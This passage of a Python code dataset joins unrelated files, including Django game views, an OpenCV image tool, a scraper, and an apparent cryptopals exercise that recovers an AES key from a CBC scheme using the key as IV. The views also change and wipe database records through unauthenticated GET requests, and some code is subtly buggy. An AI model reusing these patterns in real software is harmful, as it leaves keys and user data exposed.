= userId).values_list('cloudId')\n newLog = XLog(userId=userId, action=14)\n newLog.save()\n if len(cloudUser) == 0:\n return HttpResponse(\"[]\")\n else:\n cloudUserStr = \"[\"\n for i in range(0, len(cloudUser)):\n cloudUserStr = cloudUserStr + str(cloudUser[i][0]) + \",\"\n cloudUserStr = cloudUserStr[:-1]\n cloudUserStr = cloudUserStr + \"]\"\n return HttpResponse(cloudUserStr, content_type= 'csv/text')\n\ndef updateUser(request):\n userId = request.GET.get(\"userId\",\"\")\n totalGamesXeri = int(request.GET.get(\"totalGamesXeri\",\"0\"))\n xeri = int(request.GET.get(\"xeri\",\"0\"))\n plakoto = int(request.GET.get(\"plakoto\",\"0\"))\n emailVerified = request.GET.get(\"emailVerified\",\"\")\n pUsername = request.GET.get(\"pUsername\",\"\")\n totalGamesPlakoto = int(request.GET.get(\"totalGamesPlakoto\",\"0\"))\n words = int(request.GET.get(\"words\",\"0\"))\n totalGamesWords = int(request.GET.get(\"totalGamesWords\",\"0\"))\n authData = 
request.GET.get(\"authData\",\"\")\n username = request.GET.get(\"username\",\"\")\n isMale = request.GET.get(\"isMale\", \"1\")\n newLog = XLog(userId=userId, action=15)\n newLog.save()\n if (isMale == \"1\"):\n isMale = True\n else:\n isMale = False\n scoreFour = int(request.GET.get(\"scoreFour\",\"0\"))\n totalGamesAgonia = int(request.GET.get(\"totalGamesAgonia\",\"0\"))\n totalGamesScoreFour = int(request.GET.get(\"totalGamesScoreFour\",\"0\"))\n agonia = int(request.GET.get(\"agonia\",\"0\"))\n griniaris = int(request.GET.get(\"griniaris\", \"0\"))\n totalGamesGriniaris = int(request.GET.get(\"totalGamesGriniaris\", \"0\"))\n\n updateUser = XPlayer.objects.get(fbId = userId)\n if updateUser is None:\n return HttpResponse(\"-1\")\n else:\n updateUser.totalGamesXeri = totalGamesXeri\n updateUser.xeri = xeri\n updateUser.plakoto = plakoto\n updateUser.emailVerified = emailVerified\n updateUser.pUsername = pUsername\n updateUser.totalGamesPlakoto = totalGamesPlakoto\n updateUser.words = words\n updateUser.totalGamesWords = totalGamesWords\n updateUser.authData = authData\n updateUser.username = username\n updateUser.isMale = isMale\n updateUser.scoreFour = scoreFour\n updateUser.totalGamesAgonia = totalGamesAgonia\n updateUser.totalGamesScoreFour = totalGamesScoreFour\n updateUser.agonia = agonia\n updateUser.griniaris = griniaris\n updateUser.totalGamesGriniaris = totalGamesGriniaris\n updateUser.save()\n return HttpResponse(\"1\")\n\ndef gameStart(request):\n userId = request.GET.get(\"userId\", \" \")\n gameName = request.GET.get(\"gameName\", \" \")\n newLog = XLog(userId=userId, action=16, description = gameName)\n newLog.save()\n return HttpResponse(\"1\")\n\ndef GetJsonValue(json, key, defaultValue):\n if key in json:\n return json[key]\n return defaultValue\n\n\ndef parseToXDB(request):\n import json\n from pprint import pprint\n from datetime import datetime\n #clean tables...\n XPlayer.objects.all().delete()\n Feedback.objects.all().delete()\n 
Mute.objects.all().delete()\n FriendsList.objects.all().delete()\n with open('parse/_User.json') as data_file:\n data = json.load(data_file)\n for juser in data['results']:\n # print(juser)\n xuser = XPlayer(agonia= GetJsonValue(juser, \"agonia\", 0),\n fbId= juser[\"fbId\"],\n isMale= juser[\"isMale\"],\n objectId= juser[\"objectId\"],\n pUsername= juser[\"pUsername\"],\n username= juser[\"pUsername\"],\n plakoto= GetJsonValue(juser, \"plakoto\", 0),\n scoreFour= GetJsonValue(juser, \"scoreFour\", 0),\n totalGamesAgonia= GetJsonValue(juser, \"totalGamesAgonia\", 0),\n totalGamesPlakoto= GetJsonValue(juser, \"totalGamesPlakoto\", 0),\n totalGamesScoreFour= GetJsonValue(juser, \"totalGamesScoreFour\", 0),\n totalGamesWords= GetJsonValue(juser, \"totalGamesWords\", 0),\n totalGamesXeri= GetJsonValue(juser, \"totalGamesXeri\", 0),\n updatedAt= datetime.strptime(juser[\"updatedAt\"], \"%Y-%m-%dT%H:%M:%S.%fZ\"),\n words= GetJsonValue(juser, \"words\", 0),\n createdAT= datetime.strptime(juser[\"createdAt\"], \"%Y-%m-%dT%H:%M:%S.%fZ\") ,#\"2016-10-21T16:39:53.927Z\"\n xeri= GetJsonValue(juser, \"xeri\", 0))\n xuser.save()\n with open('parse/Feedback.json') as data_file:\n data = json.load(data_file)\n for jfeedback in data['results']:\n # print(juser)\n xuser = XPlayer.objects.get(objectId=jfeedback['user']['objectId'])\n print (xuser.fbId)\n feedback = Feedback(createdAt= datetime.strptime(jfeedback[\"createdAt\"], \"%Y-%m-%dT%H:%M:%S.%fZ\") ,#\"2016-10-21T16:39:53.927Z\"\n text= jfeedback[\"text\"],#\"2016-10-21T16:39:53.927Z\"\n facebookId=xuser.fbId,\n user=xuser.fbId)\n feedback.save()\n\n with open('parse/FriendsList.json') as data_file:\n data = json.load(data_file)\n for jentry in data['results']:\n # print(juser)\n xuser = XPlayer.objects.get(objectId=jentry['user']['objectId'])\n xfriend = XPlayer.objects.get(objectId=jentry['friend']['objectId'])\n\n print (xuser.fbId)\n\n friendList = FriendsList(createdAt= datetime.strptime(jentry[\"createdAt\"], 
\"%Y-%m-%dT%H:%M:%S.%fZ\") ,#\"2016-10-21T16:39:53.927Z\"\n user= xuser.fbId,#\"2016-10-21T16:39:53.927Z\"\n fbId= xuser.fbId,#\"2016-10-21T16:39:53.927Z\"\n friend=xfriend.fbId)\n friendList.save()\n with open('parse/Mute.json') as data_file:\n data = json.load(data_file)\n for jentry in data['results']:\n # print(juser)\n xreporter = XPlayer.objects.get(objectId=jentry['reporter']['objectId'])\n xuser = XPlayer.objects.get(objectId=jentry['user']['objectId'])\n\n print (xuser.fbId)\n\n mute = Mute(createdAt= datetime.strptime(jentry[\"createdAt\"], \"%Y-%m-%dT%H:%M:%S.%fZ\") ,#\"2016-10-21T16:39:53.927Z\"\n user= xuser.fbId,\n reporter= xreporter.fbId)\n mute.save()\n\n return HttpResponse(\"1\")","sub_path":"projectx/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"587827149","text":"import string\nfrom base64 import b64encode\n\ndef uule(city):\n\tsecret_key = list(string.ascii_uppercase) + list(string.ascii_lowercase) + list(range(0,10)) + list('-') + list('_')\n\tcode = 'w+CAIQICI' + secret_key[len(city)%64] + b64encode(city)\n\tcode = code.strip('=')\n\treturn code\n\nprint (uule('Croydon,Victoria,Australia'))\n","sub_path":"uule.py","file_name":"uule.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"126161729","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport wagtail.wagtailcore.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cms', '0006_auto_20150930_1016'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='quote',\n name='quote',\n field=wagtail.wagtailcore.fields.RichTextField(),\n ),\n 
]\n","sub_path":"cms/migrations/0007_auto_20150930_1017.py","file_name":"0007_auto_20150930_1017.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"80296449","text":"from cv2 import *\nimport numpy as np\nimport imutils\nfrom tkinter import messagebox\nfrom tkinter import *\n\n# https://www.pyimagesearch.com/2017/01/02/rotate-images-correctly-with-opencv-and-python/\n# https://docs.opencv.org/3.2.0/dd/d49/tutorial_py_contour_features.html\n# https://www.pyimagesearch.com/2017/06/19/image-difference-with-opencv-and-python/\n# https://stackoverflow.com/questions/43061143/extract-object-from-the-image-of-a-box-having-object\n# https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_core/py_image_arithmetics/py_image_arithmetics.html\n\n\nclass New_board_1:\n \"\"\"docstring for .\"\"\"\n\n def __init__(self):\n self.ban = 0\n self.ban_2 = 0 # to block the access to the image\n self.angle = 0 # Var to modify the angle of image and rotate\n self.rect = None # Var to draw a rectrangle\n self.imageROI = None # image Region Of Interest\n self.panel = np.zeros((100, 512, 3), np.uint8)\n cv2.namedWindow(\"panel\")\n cv2.namedWindow(\"full Contour\")\n cv2.createTrackbar(\"Th\", \"panel\", 230, 255, self.nothing)\n font = cv2.FONT_HERSHEY_SIMPLEX\n '''Put the text in a Windows below Trackbar'''\n cv2.putText(self.panel, 'Please move the trackbar until you only wrap the board.',\n (12, 15), font, .5, (255, 255, 255), 1, cv2.LINE_AA)\n cv2.putText(self.panel, 'Hotkeys :', (12, 30), font, .5, (255, 255, 255), 1, cv2.LINE_AA)\n cv2.putText(self.panel, 'C : take photo only of wrapper area.',\n (12, 45), font, .5, (255, 255, 255), 1, cv2.LINE_AA)\n cv2.putText(self.panel, 'S : Save the wrapper area.', (12, 60),\n font, .5, (255, 255, 255), 1, cv2.LINE_AA)\n cv2.putText(self.panel, 'J and L : Rotate the image.', (12, 75),\n font, .5, (255, 255, 255), 1, cv2.LINE_AA)\n 
cv2.putText(self.panel, 'X : Load Image Again', (12, 90),\n font, .5, (255, 255, 255), 1, cv2.LINE_AA)\n cv2.putText(self.panel, 'Q : exit', (12, 110),\n font, .5, (255, 255, 255), 1, cv2.LINE_AA)\n # for load the images\n self.empty = None\n self.full = None\n self.full_c = None # full copy\n self.roi = None\n self.img = None\n # mask for remove background\n self.mask = None\n self.mask_2 = None\n self.mask_3 = None\n self.bgdModel = np.zeros((1, 65), np.float64)\n self.fgdModel = np.zeros((1, 65), np.float64)\n # convert to grayscale\n self.empty_g = None\n self.full_g = None\n self.diff = None\n self.diff_th = None\n self.median = None\n self.board = None\n self.contours = None\n self.x = None\n self.y = None\n self.w = None\n self.h = None\n self.rect = None\n self.box = None\n self.M = None\n self.cX = None\n self.cY = None\n self.key = None\n self.kernel = np.ones((15, 15), np.uint8)\n self.imageROI = None\n self.maskROI = None\n self.rotated = None\n\n def nothing(self, x):\n pass\n\n def get_th(self):\n return cv2.getTrackbarPos(\"Th\", \"panel\")\n\n def initialize_values(self, img_e, img_f):\n self.empty = img_e\n self.full = img_f\n self.full_c = self.full.copy()\n # save color copy for visualization\n self.mask_2 = np.zeros(self.full.shape[:2], np.uint8)\n # convert to grayscale\n self.empty_g = cv2.cvtColor(self.empty, cv2.COLOR_BGR2GRAY)\n self.full_g = cv2.cvtColor(self.full, cv2.COLOR_BGR2GRAY)\n # Now create a mask of logo and create its inverse mask also\n # blur to account for small camera movement\n # you could try if maybe different values will maybe\n # more reliable for broader cases\n self.empty_g = cv2.GaussianBlur(self.empty_g, (41, 41), 0)\n self.full_g = cv2.GaussianBlur(self.full_g, (41, 41), 0)\n # get the difference between full and empty box\n self.diff = self.full_g - self.empty_g\n cv2.imshow(\"panel\", self.panel)\n # inverse thresholding to change every pixel above 190\n # to black (that means without the bag)\n th = 
self.get_th()\n _, self.diff_th = cv2.threshold(self.diff, th, 255, 1)\n self.median = cv2.medianBlur(self.diff, 15)\n # combine the difference image and the inverse threshold\n # will give us just the bag\n self.board = cv2.bitwise_and(self.diff, self.diff_th, None)\n # threshold to get the mask instead of gray pixels\n _, self.board = cv2.threshold(self.board, 100, 255, 0)\n\n # dilate to account for the blurring in the beginning\n self.board = cv2.dilate(self.board, self.kernel, iterations=1)\n\n def get_contour(self):\n _, self.contours, _ = cv2.findContours(self.board, cv2.RETR_TREE,\n cv2.CHAIN_APPROX_SIMPLE)\n self.contours = sorted(self.contours, key=cv2.contourArea, reverse=True)[:3]\n\n self.x, self.y, self.w, self.h = cv2.boundingRect(self.contours[0])\n\n def get_centroid(self):\n self.rect = cv2.minAreaRect(self.contours[0])\n self.box = cv2.boxPoints(self.rect)\n self.box = np.int0(self.box)\n self.mask = np.zeros(self.full_g.shape, dtype=\"uint8\")\n cv2.drawContours(self.mask, [self.box], -1, 255, -1)\n self.M = cv2.moments(self.contours[0])\n self.cX = int(self.M[\"m10\"] / self.M[\"m00\"])\n self.cY = int(self.M[\"m01\"] / self.M[\"m00\"])\n # put text and highlight the center\n cv2.circle(self.full_c, (self.cX, self.cY), 5, (255, 255, 0), -1)\n\n def draw_contours(self):\n cv2.drawContours(self.full_c, [self.contours[0]], -1, (0, 0, 255), 3) # red\n # cv2.rectangle(full_c, (x, y), (x+w, y+h), (0, 255, 0), 2) # green\n # cv2.drawContours(full_c, [box], 0, (255, 0, 0), 2) # blue\n\n def grab_the_board(self):\n cv2.grabCut(self.full_c, self.mask_2, (self.x, self.y, self.w, self.h),\n self.bgdModel, self.fgdModel, 5, cv2.GC_INIT_WITH_RECT)\n self.mask_3 = np.where((self.mask_2 == 2) | (self.mask_2 == 0), 0, 1).astype(\"uint8\")\n self.img = self.full*self.mask_3[:, :, np.newaxis]\n #cv2.imshow(\"R\", self.img)\n self.imageROI = self.img[self.y:self.y + self.h, self.x:self.x + self.w]\n self.maskROI = self.mask_2[self.y:self.y + self.h, self.x:self.x 
+ self.w]\n self.imageROI = cv2.bitwise_and(self.imageROI, self.imageROI,\n mask=self.maskROI)\n\n def rotated_img(self):\n self.rotated = imutils.rotate(self.imageROI, self.angle)\n\n\ndef get(root, dst, file):\n New_board = New_board_1() # initialize values\n # if the image was close the break the loop\n while cv2.getWindowProperty('panel', 0) >= 0:\n New_board.initialize_values(cv2.imread(\"Images/Rasp_Arduino/back_2.jpg\"),\n cv2.imread(\"Images/Rasp_Arduino/Comp_35.jpg\"))\n # save color copy for visualization\n # find contours, sort and draw the biggest one\n try:\n if New_board.ban < New_board.get_th():\n # Get the contour values\n New_board.get_contour()\n # draw contours\n New_board.draw_contours()\n # Get the centroid and draw the centroid\n New_board.get_centroid()\n except:\n # print(\"Bandera\")\n New_board.ban = New_board.get_th()\n\n New_board.key = cv2.waitKey(10) & 0xFF\n if New_board.key == ord('l') and New_board.angle >= 5:\n print(\"Rotate \", New_board.angle)\n New_board.angle -= 5\n New_board.rotated_img()\n cv2.imshow(\"Rotated (Problematic)\", New_board.rotated)\n if New_board.key == ord('j') and New_board.angle <= 355:\n print(\"Rotate \", New_board.angle)\n New_board.angle += 5\n New_board.rotated_img()\n cv2.imshow(\"Rotated (Problematic)\", New_board.rotated)\n\n if New_board.key == ord('c'):\n # cv2.destroyAllWindows()\n cv2.destroyWindow(\"full Contour\")\n New_board.grab_the_board()\n New_board.rotated_img()\n cv2.imshow(\"Rotated (Problematic)\", New_board.rotated)\n cv2.waitKey(0)\n New_board.ban_2 = 1\n\n if New_board.key == ord('s'):\n #cv2.imwrite(dst+\".jpg\", New_board.roi)\n New_board.ban_2 = 1\n print(dst)\n cv2.imwrite(dst+\"/\"+file+\".jpg\", New_board.rotated)\n #cv2.imwrite('Images/cap_video2.png', frame)\n # cv2.destroyWindow('ROI')\n messagebox.showinfo('Save completed', \"The file \"+file+\".jpg is saved successfully\")\n cv2.destroyAllWindows()\n\n break\n if New_board.key == ord(\"x\"):\n cv2.destroyAllWindows()\n 
New_board.__init__()\n continue\n if New_board.key == ord(\"q\"):\n cv2.destroyAllWindows()\n break\n\n if New_board.ban_2 == 0:\n #cv2.imshow(\"full\", New_board.full)\n cv2.imshow(\"full Contour\", New_board.full_c)\n\n cv2.destroyAllWindows()\n","sub_path":"Project_1/get_foreground.py","file_name":"get_foreground.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"118475423","text":"import random \nimport string\nimport sys\nfrom Crypto.Cipher import AES\n\ndef find_repeating_blocks(cip: bytes) -> int:\n chunk_tex = chunks(cip,16)\n repeat = len(chunk_tex) - len(set(chunk_tex))\n return(repeat)\n\n\ndef encrypt_aes_ecb(text:bytes,key:bytes)->bytes:\n \"\"\" takes a bunch of text and splits it in chunks, pads it in \n pkcs (#PKCS7)\n param1 : text to be encrypted (bytes)\n key : key to encrypt (bytes)\n\n r_type : cipher text (bytes)\n\n \"\"\"\n\n chunk_text = chunks(text,16)\n padded_chunks = padded_text(chunk_text)\n cipher_text = b''\n for i in padded_chunks:\n \n cipher = encrypt_128_aes_ecb(i,key)\n cipher_text += cipher\n return cipher_text \n\ndef decrypt_aes_ecb(cipher_text:bytes,key:bytes)->bytes:\n \"\"\" takes a bunch of cipher text and splits it in chunks and\n returns plain text\n param1 : text to be encrypted (bytes)\n key : key to encrypt (bytes)\n\n r_type : cipher text (bytes)\n\n \"\"\"\n\n chunk_text = chunks(cipher_text,16)\n plain_text = b''\n for i in chunk_text:\n '''\n print(\"i\",i)\n print(\"previous\",previous_chunk)\n print(\"\")\n '''\n plain = decrypt_128_aes_ecb(i,key)\n plain_text = plain_text + plain\n plain_text = unpad_valid_pkcs7(plain_text)\n return plain_text\n\n\ndef unpad_valid_pkcs7(buff):\n '''\n param1: takes a buffer of text\n return: returns unpadded plain text\n if padding is not vaild then it returns Padding Error\n TO WORK THIS DOESN\"T WORK FOR UNPADED TEXT\n '''\n if len(buff) % 16 != 0:\n return('PaddingError')\n 
last_byte = buff[-1]\n if last_byte > 16:\n return(\"PaddingError\")\n for i in range(last_byte, 0, -1):\n if buff[-i] != last_byte:\n return(\"PaddingError\")\n return buff[:-last_byte] \n\ndef encrypt_128_aes_cbc(text:bytes,key:bytes,iv:bytes)->bytes:\n \"\"\"function to take plaintext and encrypt it using aes 128 cbc \n\n param1 -> plaintext\n param2 -> key to encrypt data\n iv -> initilization vector\n\n return cipher text \n\n \"\"\"\n chunk_text = chunks(text,16)\n padded_chunks = padded_text(chunk_text)\n previous_chunk = iv\n cipher_text = b''\n for i in padded_chunks:\n xor_text = xor_chunks(i,previous_chunk)\n cipher = encrypt_128_aes_ecb(xor_text,key)\n previous_chunk = cipher\n cipher_text += cipher\n return cipher_text\n\n\n\ndef decrypt_128_aes_cbc(cipher_text,key,iv):\n chunk_text = chunks(cipher_text,16)\n previous_chunk = iv\n plain_text = b''\n for i in chunk_text:\n '''\n print(\"i\",i)\n print(\"previous\",previous_chunk)\n print(\"\")\n '''\n plain = decrypt_128_aes_ecb(i,key)\n xor_text = xor_chunks(plain,previous_chunk)\n plain_text = plain_text + xor_text\n previous_chunk = i\n return plain_text\n\n\n\n\n \n \ndef padding(msg:bytes, bsize:int)->bytes:\n \"\"\" pad the message to the blocksize using the PKCS#7 padding scheme \n :param msg -> message to pad (bytes)\n :param bsize -> the block size to use (int)\n\n return padded message (bytes)\n \"\"\"\n\n if bsize<2 and bsize>255:\n raise ValueError\n\n msg_len = len(msg)\n pad_size = bsize - (msg_len % bsize)\n pad_val = pad_size.to_bytes(1, sys.byteorder, signed=False)\n padding = pad_val * pad_size\n #print(padding)\n #print(msg)\n return(msg+padding)\n\n\n\n\n\ndef randomkey(length:int)->bytes:\n \"\"\"\n function returns a random key of given length\n param1: length of key (int)\n \n return: key (bytes)\n \"\"\"\n key = b''\n for i in range(length):\n j = random.randint(1,255)\n key = key + bytes([j])\n return key\n\n\n\ndef padded_text(chunk_text:bytes)->bytes:\n \n padded_chunks = []\n 
for i in chunk_text:\n if len(i) != 16:\n padded_chunks.append(padding(i,16))\n else:\n padded_chunks.append(i)\n\n return padded_chunks\n\ndef xor_chunks(text:bytes,p_text:bytes)->bytes:\n return bytes([_a ^ _b for _a, _b in zip(text, p_text)])\n\n\n\ndef encrypt_128_aes_ecb(text:bytes,key:bytes)->bytes:\n cipher = AES.new(key,AES.MODE_ECB)\n cipher_text = cipher.encrypt(text)\n return cipher_text\n\n\ndef decrypt_128_aes_ecb(text:bytes,key:bytes)->bytes:\n cipher = AES.new(key,AES.MODE_ECB)\n plaintext = cipher.decrypt(text)\n return plaintext\n\n\n\ndef chunks(text:bytes,blocksize:int)->bytes:\n \"\"\"\n pram1: whole encrypted messages \n pram2: amount of chunks needed \n\n return array of chunks of data\n \"\"\"\n chunk_data = b''\n chunks = []\n for i in range(0,len(text),blocksize):\n chunk_data = text[i:i+blocksize] \n chunks.append(chunk_data)\n return chunks\n\n\n\n\ndef strip_pdcks_7(data:bytes,bsize:int)->bytes:\n if len(data) % bsize != 0:\n return(0)\n\n padding_len = int(data[-1])\n \n if padding_len > 16:\n return(data)\n\n for i in range(bsize-padding_len,len(data)):\n \n if data[i] != data[-1]:\n return(data)\n\n return(data[:bsize-padding_len])\n\n\n\n\ndef encryption_oracle(text:str,key:bytes)->bytes:\n \"\"\" takes a bunch of text, adds a bunch of additional \n text, generates a random key and initilization\n vector. 
then randomly encrypts it in ebc or cbc\n\n\n param1: text to be encrypted (bytes)\n key: key to encrypt and also act as iv\n\n rtype: encrypted text (bytes)\n \"\"\"\n cipher = encrypt_128_aes_cbc(text,key,key)\n return cipher\n\ndef decryption_oracle(cipher:bytes)->bytes:\n \"\"\"\n decrypts a given cipher text encrypted in cbc and also strips out the padding \n key and iv in global variable \n \"\"\"\n plaintext = decrypt_128_aes_cbc(cipher,key,key)\n try:\n plaintext.decode(encoding='ascii')\n except UnicodeDecodeError:\n return plaintext\n \ndef encryption_breaker():\n c1 = randomkey(16)\n cipher = decryption_oracle(c1+b'\\x00'*16+c1)\n ciphers = [cipher[i:i+16] for i in range(0,len(cipher),16)]\n found_key = xor_chunks(ciphers[2],ciphers[0])\n if found_key == key:\n print('found key')\n\nif __name__ == '__main__':\n key = randomkey(16)\n encryption_breaker()\n \n","sub_path":"set4/challenge27/set2_16.py","file_name":"set2_16.py","file_ext":"py","file_size_in_byte":6221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"597904800","text":"n = int(input())\n\narr = []\ns = 0\nfor i in range(n):\n arr += [int(input())]\n s += arr[i]\n\narr.sort()\narr = arr[::-1]\ns -= arr[0]\n\nif arr[0] >= s: print(s)\nelse:\n print((arr[0] + s)//2)\n","sub_path":"13000/13754/13754.py3.py","file_name":"13754.py3.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"362644417","text":"import socket\nimport threading\nimport subprocess\nimport struct\nimport os\n\n################################################################################\n##\n## ftClientListener class\n##\n## CS 372 - Project 2 - Jeremy Prater\n##\n\nclass ftClientListener(threading.Thread):\n def __init__(self, clientPort, command, file):\n # Setup local variables from input\n threading.Thread.__init__(self);\n self.clientPort = clientPort\n self.command = 
command\n self.file = file\n\n def GetData (self):\n # Get data from socket until it is empty or closed.\n payload = bytearray();\n while True:\n data = self.ftConnection.recv(1024);\n if not data:\n return payload\n payload.extend(data)\n\n def run(self):\n # Startup the socket to listen for server response.\n print(\"ftclient listener thread on port {}\".format(self.clientPort))\n self.ftSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.ftSocket.bind ((socket.gethostname(), self.clientPort))\n self.ftSocket.settimeout(1)\n self.ftSocket.listen(1)\n self.listening = True\n self.timeoutCounter = 0;\n print ('Waiting for accept on {}'.format(self.clientPort))\n\n # Client listener loop\n while self.listening:\n try:\n # Wait for new connection\n self.ftConnection, self.ftAddress = self.ftSocket.accept()\n print ('New data connection from {}'.format(self.ftAddress))\n data = self.GetData();\n # Send response payload length...\n if self.command == 0:\n # list command\n print (\"{}\".format(data.decode('ASCII')))\n elif self.command == 1:\n # get file command\n if os.path.isfile(self.file):\n print (\"File {} exists in local directory Not overwriting!\".format(self.file))\n else:\n if len(data) > 0:\n outFile = open(self.file, 'wb')\n outFile.write(data)\n outFile.close()\n print (\"Wrote {} bytes to file {}\".format(len(data), self.file))\n else:\n print (\"File {} not found on server.\".format(self.file))\n\n else:\n self.ftConnection.send(0);\n self.listening = False\n\n # Socket time out to re-run listener loop and check for exit signal\n except socket.timeout as t:\n self.timeoutCounter += 1\n if self.timeoutCounter < 5:\n pass\n else:\n raise socket.timeout\n\n # Shutdown client listener\n self.ftSocket.close()\n print(\"ftclient closing port 
{}\".format(self.clientPort))","sub_path":"CS_372/project2/client/ftClientListener.py","file_name":"ftClientListener.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"316263135","text":"import numpy as np\nfrom scipy.interpolate import interp1d\nfrom numpy.random import random\nfrom noise import pnoise1\nimport IPython\n\nfrom cairo_utils.dcel.constants import VertE, EdgeE, FaceE\nfrom cairo_utils.constants import QUARTERPI, TWOPI\nfrom cairo_utils.dcel.Line import Line\nimport cairo_utils as utils\nfrom . import heightmap\nfrom .operatorTemplate import OperatorTemplate\nimport logging as root_logger\nlogging = root_logger.getLogger(__name__)\n\nINTERPOLATION = 'cubic'\n\nclass RiverOperator(OperatorTemplate):\n \"\"\" An operator to create a river \"\"\"\n \n def __init__(self, subdiv, octaves=1, width_min=0.03, width_max=0.08,\n deviance=0.2, repeats=3, tolerance=0.1, max_rot_delta=0.1):\n #the number of subdivisions of the main river line\n self.subdiv = subdiv\n #octaves of the perlin noise\n self.octaves = octaves\n self.deviance = deviance\n self.repeats = repeats\n #the proportion of internal steps that it takes before vector correction\n self.tolerance = tolerance\n \n self.width_range = np.array([width_min, width_max])\n\n #Required:\n self.delta = []\n self.dc = None\n self.i = None\n \n def is_oneshot(self):\n return True\n\n def __enter__(self):\n logging.info(\"Entering RiverTick Context\")\n \n \n def __exit__(self, type, value, traceback):\n logging.info(\"Exiting RiverTick Context\")\n if value is not None:\n logging.warning(\"Unwinding\")\n self.unwind()\n self.dc = None\n self.i = None\n self.delta = []\n #if exiting with an error,\n #undo the operations\n\n def __call__(self, draw=True, override=False):\n self.delta = []\n\n #pick a start and end point on two opposite edges \n bbox_min = self.dc.bbox[0]\n bbox_max = self.dc.bbox[2]\n mid_way = 
int(self.dc.bbox[2] * 0.5)\n line_points = None\n #choose a pair of sides\n if random() > 0.5:\n line_points = np.array([[mid_way,bbox_max],[mid_way, bbox_min]])\n else:\n line_points = np.array([[bbox_min, mid_way],[bbox_max, mid_way]])\n the_line = Line.newLine(line_points)\n subdivs = the_line.subdivide(self.subdiv)\n bisector = utils.math.get_bisector(*line_points)\n\n target = line_points[1]\n current = line_points[0]\n\n halfPoints = int((self.subdiv + 2) * 0.5)\n easing = pow(np.cos(QUARTERPI * np.linspace(-1, 1, halfPoints)), 3.5).reshape((-1,1))\n rotAmnt = np.array([(TWOPI * 1.3) * pnoise1(x * 0.001, octaves=self.octaves, base=int(random()*1000)) for x in range(halfPoints)])\n rotAmnt -= rotAmnt.mean()\n rot = np.column_stack((np.cos(rotAmnt), np.sin(rotAmnt))) * easing\n smoothedRot = utils.math._interpolate(rot, halfPoints * 2)\n devianceAmnt = self.deviance * self.dc.bbox[2]\n final_points = subdivs + (smoothedRot * devianceAmnt)\n \n\n #Create the lines\n if not draw:\n return self.delta\n\n edges = self.dc.createPath(final_points, edata={'river':True,\n EdgeE.WIDTH: 1})\n self.delta += edges\n return self.delta\n\n def unwind(self):\n self.dc.purge(targets=self.delta)\n self.delta = []\n \n","sub_path":"citygen/riverOperator.py","file_name":"riverOperator.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"200645194","text":"import scrapy\nimport unicodedata\n\nfrom scrapy.http import Request\n\nfrom news_scrapping.items import NewsScrappingItem\n\n\n\nclass EkantipurSpider(scrapy.Spider):\n name = 'ekantipur'\n allowed_domains = ['ekantipur.com']\n start_urls = ['http://ekantipur.com/']\n\n def parse(self, response):\n\n navigation_extracted_links = response.xpath('//*[@id=\"header\"]/div[1]/nav/div/div[2]/div/ul/li/a/@href').getall()\n navigation_links = list(filter(lambda link: 'https://ekantipur.com/' in link, navigation_extracted_links))\n for link 
in navigation_links:\n yield Request(link, callback=self.parse_link, dont_filter=True)\n \n def parse_link(self,response):\n\n item = NewsScrappingItem()\n news_category = response.url.split('https://ekantipur.com/')[1]\n base_link = response.xpath('//div[contains(@class, \"col-xs-10 col-sm-10 col-md-10\")]//article')\n for response in base_link:\n category = news_category\n title = response.xpath('div[contains(@class,\"teaser offset\")]/h2/a/text()').get()\n link = self.start_urls[0]+response.xpath('div[contains(@class,\"teaser offset\")]/h2/a/@href').get()\n description = response.xpath('div[contains(@class,\"teaser offset\")]/p/text()').get()\n images_link = response.xpath('div[contains(@class,\"image\")]/figure/a/img/@data-src').get()\n\n item['category'] = category\n item['title'] = unicodedata.normalize(\"NFKD\",title)\n item['link'] = link\n item['description'] = unicodedata.normalize(\"NFKD\",description)\n item['images_link'] = images_link\n\n yield item\n \n","sub_path":"news_scrapping/news_scrapping/spiders/ekantipur.py","file_name":"ekantipur.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"29392452","text":"from typing import Optional, Sequence\n\nfrom pytorch_lightning import LightningDataModule\nfrom torch.utils.data import ConcatDataset, DataLoader, Dataset, random_split\nfrom torchvision.datasets import MNIST\nfrom torchvision.transforms import transforms\nfrom torchvision.transforms import RandomHorizontalFlip, RandomVerticalFlip\n\nfrom ..datasets.image_dataset import DIV2KDataset, DIV2KDatasetPaired\nfrom ..datasets.sr_dataset import ContinuesSRDataset\nfrom ..datasets.implicit_image_dataset import ImplicitImageDataset\n\nfrom ..utils.transforms import RandomDFlip\n\nclass DIV2KDataModule(LightningDataModule):\n \"\"\"\n LightningDataModule for DIV2K dataset, only\n\n https://data.vision.ee.ethz.ch/cvl/DIV2K/\n \"\"\"\n\n def __init__(self, 
